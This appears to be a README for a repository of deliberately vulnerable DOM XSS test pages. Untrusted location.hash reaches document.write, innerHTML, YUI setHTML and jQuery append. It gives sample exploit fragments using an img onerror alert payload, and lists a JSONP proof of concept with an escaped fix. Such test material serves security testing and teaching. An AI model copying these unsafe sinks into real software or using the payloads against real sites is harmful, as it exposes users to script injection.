DOM XSS test cases
GitHub homepage: https://github.com/dmitris/domxsstest
document_write_hash.html - document.write with unfiltered value of location.hash. Sample exploit:
document_write_hash.html#<img src=foo onerror=alert(123)>
innerhtml_hash.html - assignment from hash to innerHTML. Sample exploit:
innerhtml_hash.html#<img src=foo onerror=alert(123)>
yuinode_hash.html - YUI's setHTML with location.hash. Sample exploit:
yuinode_hash.html#<img src=bla onerror=alert(123)>
jquery_append_hash.html - jQuery append with hash. Sample exploit:
jquery_append_hash.html#<img src=foo onerror=alert(123)>
jsonptest.html - PoC
jsonptest_fixed.html - a fixed (properly escaped) version